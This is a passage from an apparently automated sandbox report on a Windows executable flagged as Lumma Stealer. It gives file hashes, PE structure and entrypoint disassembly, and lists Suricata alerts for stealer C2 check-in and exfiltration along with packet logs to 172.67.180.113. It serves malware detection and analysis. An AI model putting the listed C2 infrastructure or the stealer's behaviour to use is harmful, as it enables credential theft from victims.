                                                                                                                    • 172.67.214.186
                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.151.193

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    00000.ps1Get hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.180.113

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    No created / dropped files found

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                    Entropy (8bit):6.372940988179131
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:MPySEh8HaF.exe
                                                                                                                    File size:7'409'664 bytes
                                                                                                                    MD5:58cffd92455eec9cd613ede591ed6c2c
                                                                                                                    SHA1:388ef427a8f87c9e20a1cb7408b7bd4e81ed4117
                                                                                                                    SHA256:a7c488cf2a71ee29da1d9267bd7d3bc9f9e4d5ff1c2da0db5669e0af44a232e8
                                                                                                                    SHA512:e41cf7e38b19826667fcb4d933458b5f976ba343b1ae07bab5e3c7bc1750c59224b1280f0afcff8552126aabe15c468bee706dbe55003acb3143247b64e9180e
                                                                                                                    SSDEEP:49152:HaGYgu3W0tm+q+en0+qwZ8x1r9xxDtlg9RNPi8qqNTiFOnLPLbWicCW+drNu0I4b:6tGZPNiekumY58ZSggJPLJvyLHefPUG
                                                                                                                    TLSH:0F766B90F9DB54F5DA03193014A7627F53305E098B24CB87FA6C7F6AEF77A920932609
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........(o...............2..@.......J........b...@..........................@t.......q...@................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:5571717145496155

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x464a80
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:6
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:6
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:6
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    jmp 00007F8510803FE0h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                    sub esp, 28h
                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                    mov dword ptr [esp+10h], ebp
                                                                                                                    mov dword ptr [esp+14h], esi
                                                                                                                    mov dword ptr [esp+18h], edi
                                                                                                                    mov esi, eax
                                                                                                                    mov edx, dword ptr fs:[00000014h]
                                                                                                                    cmp edx, 00000000h
                                                                                                                    jne 00007F8510806319h
                                                                                                                    mov eax, 00000000h
                                                                                                                    jmp 00007F8510806376h
                                                                                                                    mov edx, dword ptr [edx+00000000h]
                                                                                                                    cmp edx, 00000000h
                                                                                                                    jne 00007F8510806317h
                                                                                                                    call 00007F8510806409h
                                                                                                                    mov dword ptr [esp+20h], edx
                                                                                                                    mov dword ptr [esp+24h], esp
                                                                                                                    mov ebx, dword ptr [edx+18h]
                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                    cmp edx, ebx
                                                                                                                    je 00007F851080632Ah
                                                                                                                    mov ebp, dword ptr fs:[00000014h]
                                                                                                                    mov dword ptr [ebp+00000000h], ebx
                                                                                                                    mov edi, dword ptr [ebx+1Ch]
                                                                                                                    sub edi, 28h
                                                                                                                    mov dword ptr [edi+24h], esp
                                                                                                                    mov esp, edi
                                                                                                                    mov ebx, dword ptr [ecx]
                                                                                                                    mov ecx, dword ptr [ecx+04h]
                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                    mov dword ptr [esp+04h], ecx
                                                                                                                    mov dword ptr [esp+08h], edx
                                                                                                                    call esi
                                                                                                                    mov eax, dword ptr [esp+0Ch]
                                                                                                                    mov esp, dword ptr [esp+24h]
                                                                                                                    mov edx, dword ptr [esp+20h]
                                                                                                                    mov ebp, dword ptr fs:[00000014h]
                                                                                                                    mov dword ptr [ebp+00000000h], edx
                                                                                                                    mov edi, dword ptr [esp+18h]
                                                                                                                    mov esi, dword ptr [esp+14h]
                                                                                                                    mov ebp, dword ptr [esp+10h]
                                                                                                                    mov ebx, dword ptr [esp+1Ch]
                                                                                                                    add esp, 28h
                                                                                                                    retn 0004h
                                                                                                                    ret
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                    mov edx, dword ptr [ecx]
                                                                                                                    mov eax, esp

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7000000x3dc.idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7250000x1e5b5.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7010000x2234c.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x62cfc00xa0.data
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x3287750x328800366839e41de1a466fcba48f4d577a30aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x32a0000x3019c40x301a00617683e83d99a090dc761597a12f73c0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x62c0000xd36280xa5a0033efe1ea055f3e5178353d2d50da8b27False0.4575029481132076data5.647032850172966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .idata0x7000000x3dc0x400870c902ca2142c4e773c15cba68df9d6False0.48828125data4.566261873246425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .reloc0x7010000x2234c0x224000e99a7ce117cb2e4ab42c915b52f1150False0.593022924270073data6.651526525504227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    .symtab0x7240000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x7250000x1e5b50x1e60072d8aa85360d6593bb1fcdd13314ca7dFalse0.37333622685185186data5.540714448763649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0x7252340x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.6613475177304965
                                                                                                                    RT_ICON0x72569c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.4474671669793621
                                                                                                                    RT_ICON0x7267440x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.3934647302904564
                                                                                                                    RT_ICON0x728cec0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishUnited States0.31471421823334905
                                                                                                                    RT_ICON0x72cf140x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.17295634685910327
                                                                                                                    RT_ICON0x73d73c0x53b0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004667662434652
                                                                                                                    RT_GROUP_ICON0x742aec0x5adataEnglishUnited States0.7444444444444445
                                                                                                                    RT_VERSION0x742b480x308data0.4639175257731959
                                                                                                                    RT_MANIFEST0x742e500x765XML 1.0 document, ASCII text, with very long lines (324), with CRLF line terminatorsEnglishUnited States0.358161648177496

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishUnited States

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-26T12:01:25.214023+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:25.996826+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449735172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:25.996826+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:27.363336+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:28.174922+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:28.174922+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:30.177968+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:31.200309+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449738172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:32.745925+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:35.447332+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:37.988249+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:40.516752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:40.521382+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449742172.67.180.113443TCP
                                                                                                                    2024-12-26T12:01:43.487771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.180.113443TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 26, 2024 12:01:23.899168015 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:23.899274111 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:23.899378061 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:23.903027058 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:23.903065920 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.213948011 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.214023113 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:25.218405962 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:25.218420029 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.218708992 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.268682003 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:25.285439014 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:25.285464048 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:25.285568953 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.996824026 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.996958017 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:25.997016907 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:26.001116991 CET49735443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:26.001159906 CET44349735172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:26.058948994 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:26.059001923 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:26.059077024 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:26.059376001 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:26.059390068 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:27.363202095 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:27.363336086 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:27.364753008 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:27.364764929 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:27.365003109 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:27.374068975 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:27.374093056 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:27.374146938 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.174926996 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.174995899 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.175029993 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.175050020 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.175060987 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.175071955 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.175101042 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.176512957 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.176563025 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.184732914 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.193152905 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.193181038 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.193203926 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.193223953 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.193269014 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.294567108 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.346889973 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.346905947 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.388631105 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.388720989 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.388825893 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.388842106 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.388880968 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.520076990 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.520123005 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.520134926 CET49737443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.520142078 CET44349737172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.870455980 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.870485067 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:28.870560884 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.871269941 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:28.871282101 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:30.177895069 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:30.177968025 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:30.179414034 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:30.179425955 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:30.179665089 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:30.186321974 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:30.186491013 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:30.186527014 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:30.189372063 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:30.189379930 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:31.200304985 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:31.200404882 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:31.200453043 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:31.214903116 CET49738443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:31.214916945 CET44349738172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:31.440697908 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:31.440743923 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:31.440812111 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:31.441787004 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:31.441802025 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:32.745831013 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:32.745924950 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:32.747322083 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:32.747334957 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:32.747572899 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:32.752517939 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:32.752671003 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:32.752698898 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:33.552439928 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:33.552527905 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:33.552592993 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:33.552781105 CET49739443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:33.552797079 CET44349739172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:34.142524004 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:34.142549038 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:34.142673016 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:34.143016100 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:34.143024921 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:35.447256088 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:35.447331905 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:35.448596001 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:35.448601961 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:35.448822975 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:35.450059891 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:35.450196028 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:35.450217009 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:35.450278997 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:35.450284004 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:36.428957939 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:36.429079056 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:36.429116964 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:36.429267883 CET49740443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:36.429280996 CET44349740172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:36.682248116 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:36.682281017 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:36.682339907 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:36.682765007 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:36.682780027 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:37.988176107 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:37.988249063 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:37.989676952 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:37.989687920 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:37.989931107 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:37.991230011 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:37.991332054 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:37.991339922 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:38.826598883 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:38.826672077 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:38.826719999 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:38.826901913 CET49741443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:38.826910973 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:39.211967945 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:39.212025881 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:39.212115049 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:39.212482929 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:39.212491989 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.516666889 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.516752005 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.518101931 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.518106937 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.518327951 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.519706964 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.520935059 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.520956993 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521034956 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521055937 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521146059 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521240950 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521336079 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521363020 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521462917 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521493912 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521636009 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521661997 CET44349742172.67.180.113192.168.2.4
